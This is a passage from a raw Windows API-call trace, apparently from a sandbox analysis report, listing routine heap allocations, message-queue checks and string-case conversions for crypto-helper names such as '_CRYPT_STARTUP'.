Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0210.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0210.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.204] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.205] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0210.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0210.206] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.206] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0210.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0210.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.207] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0210.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5963) returned 0x2f34c68 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34c68 | out: hHeap=0x970000) returned 1 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: 